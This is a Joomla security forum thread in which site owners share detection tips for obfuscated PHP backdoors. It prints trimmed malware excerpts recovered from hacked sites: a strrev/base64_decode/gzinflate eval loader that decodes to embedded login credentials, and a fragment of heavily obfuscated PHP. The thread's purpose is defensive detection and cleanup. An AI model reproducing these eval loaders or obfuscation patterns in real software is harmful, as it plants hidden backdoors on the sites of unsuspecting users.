Watch out for "edoced_46esab" and "etalfnizg"

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
rschneid
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Wed Feb 06, 2008 11:34 am

Watch out for "edoced_46esab" and "etalfnizg"

Post by rschneid » Thu Nov 05, 2009 4:30 pm

Hi,
I just found the following version of the base64_decode/gzinflate hack.

They used the form:
"$v1 = strrev("edoced_46esab"); $v2 = strrev("etalfnizg"); eval ...."

So in case you think your site got hacked:
Don't "grep" only for "base64_decode" and/or "gzinflate";
also scan for "edoced_46esab" and "etalfnizg".

Hope this helps.

panosgr
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 147
Joined: Fri Sep 28, 2007 8:40 pm

Re: Watch out for "edoced_46esab" and "etalfnizg"

Post by panosgr » Thu Nov 05, 2009 5:48 pm

Yes that is correct and that is not the only version we have!
There some versions thats are complete masked, no "eval", no "base64" at all

User avatar
fw116
Joomla! Ace
Joomla! Ace
Posts: 1373
Joined: Tue Sep 06, 2005 11:18 am
Location: Germany

Re: Watch out for "edoced_46esab" and "etalfnizg"

Post by fw116 » Thu Nov 05, 2009 7:05 pm

old, very OLD..

just check for iframe injections ...

jeffchannell
Joomla! Ace
Joomla! Ace
Posts: 1964
Joined: Tue Jun 09, 2009 2:21 am
Location: WV
Contact:

Re: Watch out for "edoced_46esab" and "etalfnizg"

Post by jeffchannell » Mon Nov 09, 2009 4:05 pm

Surely you can see that was likely randomly generated, right?
http://jeffchannell.com - Joomla Extensions & Support
http://biziant.com - Open Joomla Firewall/IDS
Unsolicited private messages/emails = hire me to fix your problem.
καλλιστι

User avatar
wernejo
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 231
Joined: Sun Jun 17, 2007 9:17 am
Location: Australia
Contact:

Re: Watch out for "edoced_46esab" and "etalfnizg"

Post by wernejo » Wed Jun 05, 2013 11:32 pm

Sorry to be the one who digs up old bones but I've just recently been hit with an attack like you mentioned.

yesterday i pulled this out of a virus file on one of my websites.

Code: Select all

$v1 = strrev("edoced_46esab");

$v3 = strrev("etalfnizg");

eval($v1("JGxvZ2luPSI5MTMiOyRtZDVfcGFzcz0iYzU5NTk2NzI3ZDhlMWUwMjE5YzRmMzc3Y2JjM2JmOTIiOw=="));

eval($v3($v1(strrev('......'))));
however, after translating $v1 i got this code

Code: Select all

$login="913";$md5_pass="c59596727d8e7cbc3bf92";
dose anyone know what that's used for? this is new to me and i want to know exactly whats going on!

but wait! there's more...

has anyone seen this before?

Code: Select all

<?php
$c68qQZI4Gy='ge75RUiHr'&~WZ;$nwT="a}".sUnJceej."|"&Pe6A.'{'.ExDmi.'/';$joUVHBcJel0=#qIDluZ'.
         0$12D0#!a$0';$Wlx=Zd^hQ;$Uut='/io'&'ow?';$mj1='"'./*V'.
           6M($d1wH5jkr($CgKSagg.$TwA)),/*'.
            'Y_k|z$TS K*/$V7DvLSLo.$k2QSURec.$Wlx.$g3xeMi40r) or m|V_PE7ZcE]H5^I+';
this code was one of 100 odd files i removed off my website. no two files where alike but they all had the same encryption and no closing php tag. whoever did this knows quite a bit about masking his intentions.

any ideas?
Last edited by mandville on Thu Jun 06, 2013 1:19 am, edited 1 time in total.
Reason: trimmed code,


Locked

Return to “Security in Joomla! 1.5”